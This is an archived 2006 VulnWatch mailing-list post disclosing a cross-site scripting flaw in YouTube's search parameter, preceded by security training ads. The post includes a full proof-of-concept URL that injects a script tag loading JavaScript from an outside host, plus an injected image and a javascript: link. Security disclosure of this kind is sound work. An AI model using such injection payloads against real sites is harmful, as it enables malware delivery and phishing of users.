Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]

[VulnWatch] You tube html/javascript code injection

Subject: [VulnWatch] You tube html/javascript code injection
Date: Thu, 08 Jun 2006 21:46:33 +0200
THere exist a lack of checking in the parametrs passed to the 
search engine as a result it is possible to even change the contents
of the page. A successfull exploitation may not only allow to execute
js code for instance to download trojans, but it is also possible to
use as a phisher attack. Here is an example that illustrates the
threat:
http://www.youtube.com/results?search=gaki+no+tsuki%20%3Cimg%20src=%22http://www.danad.com.pl/pic/Zwierzeta/Kroliki/krolik%20002.jpg%22%3E%20%20%3Cscript%20src=%22http://michal.mooo.com/biuro/gora.js%22%20type=%22text/javascript%22%20language=%22JavaScript%22%3E%3C/script%3E%20%3Ca%20href=%22javascript:alert('exploited')%22%3EClick%20me%20to%20test%3C/a%3E&search_type=search_videos&search=Search
I would like to than my precious Magdalena Pogorzelska for her support.
Regards sectroyer(Micha3 Majchrowicz).

<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] You tube html/javascript code injection, sectroyer <=